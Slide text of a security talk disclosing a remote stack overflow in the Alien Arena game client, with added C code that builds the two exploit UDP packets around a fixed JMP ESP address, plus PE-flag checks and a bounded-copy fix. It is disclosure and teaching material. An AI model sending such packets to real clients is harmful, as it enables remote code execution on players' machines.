Anonymous Remote Arbitrary Code Execution in Alien Arena
Jason
AHA_0x0025 • October 28th, 2009
About Me
• 2007 – Present: Principal Security Consultant @ NGSSoftware
• 2004 – 2007: Reverse Engineer @ Microsoft Corporation
Background
• June 21, 2009 – New open source game announced on Slashdot
Approach
• Download source code
• Analyze how incoming packets are parsed
• Look for security vulnerabilities
• Develop proof-of-concept exploit
• Responsibly disclose vulnerability to publisher
Parsing Incoming Packets
Stack Frame
Offset    Value           Bytes
-0x012A   seps            2
-0x0128   players         4
-0x0124   result          4
-0x0120   playername      32
-0x0100   lastToken       256
 0x0000   Return Address  4
 0x0004   adr             20
 0x0018   status_string   4
Exploitation
• We can clearly overwrite the Return Address
• What address should we use, though?
Exploitation
• Ideally:
1. Address is constant across all versions of Windows
2. Address does not contain a null-byte (0x00345678 would be bad)
3. Code at this address is readable and executable
4. Attacker can write to this address
Exploitation
• Address of a static/global variable in Alien Arena’s executable:
1. Address is constant across all versions of Windows
   Constant address since the executable is not linked for Address Space Layout Randomization (ASLR), i.e. without /DYNAMICBASE, so it is mapped at its preferred image base on every version of Windows
2. Address does not contain a null-byte (0x00345678 would be bad)
   The .data PE section ranges from [0x000BB000 – 0x05A833D9], so we should be able to find a variable whose address doesn’t contain a null-byte
3. Code at this address is readable and executable
   The .data PE section’s characteristics are linked as both Readable and Writable, and since the executable isn’t linked for DEP (no /NXCOMPAT), the process runs with DEP off under the default opt-in policy, so the section is executable too
4. Attacker can write to this address
   We need to find a static/global variable in Alien Arena that we can write to whose address doesn’t contain a null-byte
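The four criteria above can be checked mechanically. The C program below is an added example written for this page, not the talk's tooling and not Alien Arena code: it parses the headers of a 32-bit PE image for the /DYNAMICBASE and /NXCOMPAT flags (criteria 1 and 3), counts sections that are writable and effectively executable (criteria 3 and 4), and finds the first address inside such a section with no zero byte (criterion 2). It fabricates a minimal PE header in memory as constructed test data; treating the quoted .data range as RVAs under a 0x00400000 image base is an assumption. To use it on a real binary, read the file into a buffer and hand it to pe_inspect().

```c
/* Added example (not from the talk or the Alien Arena sources): check a PE32 image against
 * the four "ideal address" criteria. Linker flags decide criteria 1 (ASLR) and 3 (DEP);
 * writable sections that are effectively executable cover 3 and 4; the first such section
 * is searched for an address with no 0x00 byte (criterion 2). Offsets follow the PE/COFF
 * spec; build_test_image() fabricates a minimal header so the program runs offline. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040u  /* linked with /DYNAMICBASE (ASLR) */
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT    0x0100u  /* linked with /NXCOMPAT (DEP) */
#define IMAGE_SCN_MEM_EXECUTE 0x20000000u
#define IMAGE_SCN_MEM_READ    0x40000000u
#define IMAGE_SCN_MEM_WRITE   0x80000000u

struct pe_summary {
    int aslr, dep;            /* DYNAMIC_BASE / NX_COMPAT set in DllCharacteristics */
    uint32_t image_base;
    int writable_exec;        /* sections an attacker can both write to and execute from */
    uint32_t nullfree_target; /* first such virtual address with no zero byte, 0 if none */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Criterion 2: an address that passes through strcpy() must contain no 0x00 byte. */
int addr_has_null_byte(uint32_t a) {
    for (int s = 0; s < 32; s += 8) if (((a >> s) & 0xFFu) == 0) return 1;
    return 0;
}

/* Lowest address in [lo, hi] with no zero byte, or 0 if none. The highest zero byte is bumped
 * to 0x01 and the bytes below it cleared (the next candidate), so this takes a few steps. */
uint32_t first_nullfree_addr(uint32_t lo, uint32_t hi) {
    for (uint32_t a = lo; a <= hi;) {
        int s;
        for (s = 24; s >= 0 && ((a >> s) & 0xFFu) != 0; s -= 8) { }
        if (s < 0) return a;                                   /* all four bytes non-zero */
        a = (a & (s == 24 ? 0 : 0xFFFFFFFFu << (s + 8))) | (1u << s);
    }
    return 0;
}

/* Parse the headers of a PE32 image held in memory: 0 on success, -1 if malformed. */
int pe_inspect(const uint8_t *img, size_t len, struct pe_summary *s) {
    memset(s, 0, sizeof *s);
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t nt = rd32(img + 0x3C);                                   /* e_lfanew */
    if (nt > len || len - nt < 24 || memcmp(img + nt, "PE\0\0", 4) != 0) return -1;
    const uint8_t *fh = img + nt + 4, *oh = fh + 20;     /* IMAGE_FILE_HEADER, OPTIONAL_HEADER32 */
    uint16_t nsec = rd16(fh + 2), optsz = rd16(fh + 16);
    if (optsz < 72 || len - nt - 24 < optsz || rd16(oh) != 0x10Bu) return -1;
    s->image_base = rd32(oh + 28);
    uint16_t dllc = rd16(oh + 70);                                    /* DllCharacteristics */
    s->aslr = (dllc & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0;
    s->dep  = (dllc & IMAGE_DLLCHARACTERISTICS_NX_COMPAT) != 0;
    const uint8_t *sh = oh + optsz;                                   /* IMAGE_SECTION_HEADER[] */
    if (len - (size_t)(sh - img) < (size_t)nsec * 40) return -1;
    for (unsigned i = 0; i < nsec; i++, sh += 40) {
        uint32_t vsize = rd32(sh + 8), va = rd32(sh + 12), ch = rd32(sh + 36);
        /* Without /NXCOMPAT a 32-bit process runs with DEP off under the default opt-in
         * policy, so a writable section is executable whether or not it is flagged so. */
        int exec = (ch & IMAGE_SCN_MEM_EXECUTE) != 0 || !s->dep;
        if (!(ch & IMAGE_SCN_MEM_WRITE) || !exec) continue;
        s->writable_exec++;
        if (s->nullfree_target == 0 && vsize != 0)
            s->nullfree_target = first_nullfree_addr(s->image_base + va, s->image_base + va + vsize - 1);
    }
    return 0;
}

/* Constructed test data: a minimal PE32 header with one read/write ".data" section covering the
 * range the talk quotes for .data, treated as RVAs under image base 0x00400000 (an assumption). */
size_t build_test_image(uint8_t *buf, size_t cap, int aslr, int dep) {
    const size_t need = 0x40 + 4 + 20 + 224 + 40;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, 0x40);
    memcpy(buf + 0x40, "PE\0\0", 4);
    uint8_t *fh = buf + 0x44, *oh = fh + 20, *sh = oh + 224;
    wr16(fh + 0, 0x14C);  wr16(fh + 2, 1);  wr16(fh + 16, 224);     /* i386, 1 section, opt hdr size */
    wr16(oh + 0, 0x10B);  wr32(oh + 28, 0x00400000u);               /* PE32 magic, ImageBase */
    wr16(oh + 70, (uint16_t)((aslr ? IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE : 0) |
                             (dep ? IMAGE_DLLCHARACTERISTICS_NX_COMPAT : 0)));
    memcpy(sh, ".data", 5);
    wr32(sh + 8, 0x05A833D9u - 0x000BB000u + 1);                     /* VirtualSize */
    wr32(sh + 12, 0x000BB000u);                                      /* VirtualAddress */
    wr32(sh + 36, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE);
    return need;
}

int main(void) {
    uint8_t img[512]; struct pe_summary s;
    size_t n = build_test_image(img, sizeof img, 0, 0);
    if (n == 0 || pe_inspect(img, n, &s) != 0) return 1;
    printf("ASLR=%d DEP=%d writable+executable sections=%d null-free target=0x%08X\n",
           s.aslr, s.dep, s.writable_exec, (unsigned)s.nullfree_target);
    return 0;
}
```

With the flags cleared, as in the talk's target, the .data section counts as writable and executable and the first null-free address in it is reported; with /DYNAMICBASE and /NXCOMPAT set, criterion 1 fails and no writable section qualifies.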
The servers Global Array
• The servers global array begins at static address 0x05BE8EE0
• servers[0].port is at static address 0x05BE8F00
• servers[1].port is at static address 0x05BE9734
Payload #1
• We can write 2 bytes to static address 0x05BE9734
• The function with the overflow vulnerability is a __cdecl function, so after “returning” to the overwritten return address, ESP points right after the overwritten return address, which we also control (a __cdecl callee returns with a plain ret rather than ret N, so nothing is skipped; the bytes that follow our fake return address in the overflow are now the top of the stack)
• Machine code for JMP ESP is 0xFF 0xE4 – exactly two bytes! How convenient!
UDP Packet #1
Offset      Hex Data                  ASCII
0x00000000  FF FF FF FF 73 65 72 76   ....serv
0x00000008  65 72 73 20 00 00 00 00   ers ....
0x00000010  00 00 00 00 00 00 FF E4   ........
• -1 to cause CL_ReadPackets() to call CL_ConnectionlessPacket()
• “servers” command to cause CL_ConnectionlessPacket() to call CL_ParseGetServersResponse()
• servers[0] IP address = 0.0.0.0, servers[0].port = 0x0000
• servers[1] IP address = 0.0.0.0, servers[1].port = 0xE4FF, stored little-endian, so the bytes at 0x05BE9734 are FF E4: JMP ESP
Payload #2
• We now have a static address to return to
• We need to overflow the lastToken buffer, overwrite the return address, and follow it with our shellcode
• Shellcode can’t contain null-bytes, ‘\n’, or ‘\\’ characters since they’re used for string tokenization (the return address 0x05BE9734 contains none of them either)
UDP Packet #2
Offset      Hex Data                  ASCII
0x00000000  FF FF FF FF 70 72 69 6E   ....prin
0x00000008  74 0A 41 41 41 41 41 41   t.AAAAAA
...
0x00000108  41 41 34 97 BE 05 33 C9   AA4...3.
...
0x000001F0  7A 1A 0A                  z..
• -1 to cause CL_ReadPackets() to call CL_ConnectionlessPacket()
• “print” command to cause CL_ConnectionlessPacket() to call M_AddToServerList(…)
• 256 (0x100) junk bytes to fill lastToken
• Overwritten Return Address: 0x05BE9734, written little-endian as 34 97 BE 05 at offset 0x10A
• Shellcode follows immediately after the return address
• Trailing ‘\n’ for GetLine(…)
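As an added example (not the talk's exploit code), the two datagrams above can be assembled in C as follows, with the tokenizer's bad bytes checked before anything is sent. Framing and offsets are those of the hex dumps; the bytes placed after the return address are a constructed INT3 placeholder, not the talk's shellcode.

```c
/* Added example (not from the talk): assemble the two UDP datagrams whose hex dumps appear
 * above and check the attacker-controlled bytes against the client's tokenizer. Framing and
 * offsets come from the dumps; the payload after the return address is a constructed
 * placeholder (INT3 traps), not the talk's shellcode. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JMP_ESP_ADDR   0x05BE9734u  /* servers[1].port: holds FF E4 once packet #1 has landed */
#define LASTTOKEN_SIZE 256          /* bytes from lastToken to the saved return address */
#define PRINT_HDR_LEN  10           /* FF FF FF FF "print\n" */
#define RET_OFFSET     (PRINT_HDR_LEN + LASTTOKEN_SIZE)  /* 0x10A, as in the dump */

/* Bytes the client's string handling consumes: 0x00 (C string end), '\n' (GetLine),
 * '\\' (token separator). None may appear from the filler onward. */
int is_bad_byte(uint8_t b) { return b == 0x00 || b == '\n' || b == '\\'; }

/* Index of the first bad byte in buf, or -1 when it is clean. */
int find_bad_byte(const uint8_t *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (is_bad_byte(buf[i])) return (int)i;
    return -1;
}

/* Packet #1: -1 header, "servers " command, then 6-byte entries of IPv4 address and port.
 * The second entry's port bytes are FF E4, which is JMP ESP once they sit at
 * servers[1].port. Returns the datagram length, 0 if 'out' is too small. */
size_t build_servers_packet(uint8_t *out, size_t cap) {
    static const uint8_t pkt[] = {
        0xFF, 0xFF, 0xFF, 0xFF,                  /* connectionless packet marker */
        's', 'e', 'r', 'v', 'e', 'r', 's', ' ',
        0, 0, 0, 0, 0x00, 0x00,                  /* servers[0]: 0.0.0.0, port 0x0000 */
        0, 0, 0, 0, 0xFF, 0xE4                   /* servers[1]: 0.0.0.0, port bytes FF E4 */
    };
    if (cap < sizeof pkt) return 0;
    memcpy(out, pkt, sizeof pkt);
    return sizeof pkt;
}

/* Packet #2: -1 header and "print\n" so the body reaches M_AddToServerList(), then
 * LASTTOKEN_SIZE filler bytes, the little-endian address of the planted JMP ESP, the payload
 * ESP points at after the ret, and a final '\n' to end the line for GetLine(). Refuses
 * payloads or addresses containing a bad byte. Returns the datagram length, 0 on error. */
size_t build_print_packet(uint8_t *out, size_t cap, const uint8_t *payload, size_t plen) {
    static const uint8_t hdr[PRINT_HDR_LEN] = { 0xFF, 0xFF, 0xFF, 0xFF, 'p', 'r', 'i', 'n', 't', '\n' };
    uint8_t ret[4] = { (uint8_t)JMP_ESP_ADDR, (uint8_t)(JMP_ESP_ADDR >> 8),
                       (uint8_t)(JMP_ESP_ADDR >> 16), (uint8_t)(JMP_ESP_ADDR >> 24) };
    size_t need = RET_OFFSET + sizeof ret + plen + 1;
    if (cap < need) return 0;
    if (find_bad_byte(ret, sizeof ret) >= 0 || find_bad_byte(payload, plen) >= 0) return 0;
    uint8_t *p = out;
    memcpy(p, hdr, sizeof hdr);        p += sizeof hdr;
    memset(p, 'A', LASTTOKEN_SIZE);    p += LASTTOKEN_SIZE;    /* 0x100 junk bytes */
    memcpy(p, ret, sizeof ret);        p += sizeof ret;        /* overwrites the return address */
    memcpy(p, payload, plen);          p += plen;              /* what JMP ESP lands on */
    *p++ = '\n';                                               /* terminates GetLine() */
    return (size_t)(p - out);
}

int main(void) {
    static const uint8_t placeholder[] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* constructed: INT3 traps */
    uint8_t p1[64], p2[512];
    size_t n1 = build_servers_packet(p1, sizeof p1);
    size_t n2 = build_print_packet(p2, sizeof p2, placeholder, sizeof placeholder);
    printf("packet #1: %zu bytes, packet #2: %zu bytes, return address at offset 0x%X\n",
           n1, n2, (unsigned)RET_OFFSET);
    return (n1 && n2) ? 0 : 1;
}
```

Packet #1 has to arrive first so that FF E4 sits at servers[1].port before packet #2's ret pops 0x05BE9734; both are ordinary UDP datagrams sent with sendto() to the client's game port. A real payload goes through the same find_bad_byte() gate, which is why an encoder or a null-free, newline-free, backslash-free shellcode is needed.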
Demo
Conclusion
• Anonymous remote attacker can execute arbitrary code on clients’ systems by sending two UDP packets
• Other vulnerabilities likely still exist in codebase
• Developers:
– GS, ASLR, DEP would have deterred exploitation (/GS stack cookies, /DYNAMICBASE, /NXCOMPAT)
– Don’t use SDL-banned API functions like strcpy(…)
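The Developers point deserves a concrete before and after. The block below is an added example written for this page, not Alien Arena's source: it reconstructs the unsafe pattern implied by the stack frame (a strcpy() into a 256-byte lastToken) as an assumption about the code, puts a bounded copy beside it, and models the two separators the talk names, '\n' for GetLine() and '\\' between tokens.

```c
/* Added example (not Alien Arena's code): the unsafe pattern behind the lastToken overflow,
 * reconstructed as an assumption from the stack frame in the talk, next to a bounded
 * replacement. The tokenizer models the two separators the talk names: GetLine() stops at
 * '\n' and tokens are split at '\\'. */
#include <stddef.h>
#include <string.h>

#define LASTTOKEN_SIZE 256   /* size of the stack buffer that precedes the return address */

/* Unsafe: strcpy() writes strlen(tok)+1 bytes regardless of the destination size. A token of
 * LASTTOKEN_SIZE bytes or more runs into the saved return address, which is the write
 * packet #2 performs. Shown for contrast; never called with untrusted data here. */
void copy_token_unsafe(char lastToken[LASTTOKEN_SIZE], const char *tok) {
    strcpy(lastToken, tok);
}

/* True if copy_token_unsafe(tok) would write past a LASTTOKEN_SIZE buffer. */
int strcpy_would_overflow(const char *tok) {
    return strlen(tok) + 1 > LASTTOKEN_SIZE;
}

/* Bounded replacement: copies toklen bytes plus a terminator only if they fit, otherwise
 * reports failure instead of truncating silently or overflowing. Returns 0 or -1. */
int copy_token_checked(char *dst, size_t dstsz, const char *tok, size_t toklen) {
    if (toklen >= dstsz) return -1;
    memcpy(dst, tok, toklen);
    dst[toklen] = '\0';
    return 0;
}

/* Consume one line of 'buf' (up to '\n' or len bytes, like GetLine()), split it at '\\' and
 * copy each non-empty piece into tokens[] with the bounded copy. Returns the token count, or
 * -1 if a piece does not fit or there are more than max_tokens pieces. */
int parse_status_line(const char *buf, size_t len, char tokens[][LASTTOKEN_SIZE], int max_tokens) {
    size_t end = 0;
    while (end < len && buf[end] != '\n') end++;
    int n = 0;
    size_t start = 0;
    for (size_t i = 0; i <= end; i++) {
        if (i < end && buf[i] != '\\') continue;     /* still inside a token */
        if (i > start) {                              /* skip empty pieces, e.g. a leading '\\' */
            if (n == max_tokens) return -1;
            if (copy_token_checked(tokens[n], LASTTOKEN_SIZE, buf + start, i - start) < 0)
                return -1;
            n++;
        }
        start = i + 1;
    }
    return n;
}
```

A /GS cookie would turn the overflow into a process abort rather than a ret to 0x05BE9734, but only the bounded copy removes the bug. The checked copy rejects an oversized token instead of clipping it, so a caller cannot mistake a truncated token for a complete one, which is the failure mode strncpy() alone invites.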
Q & A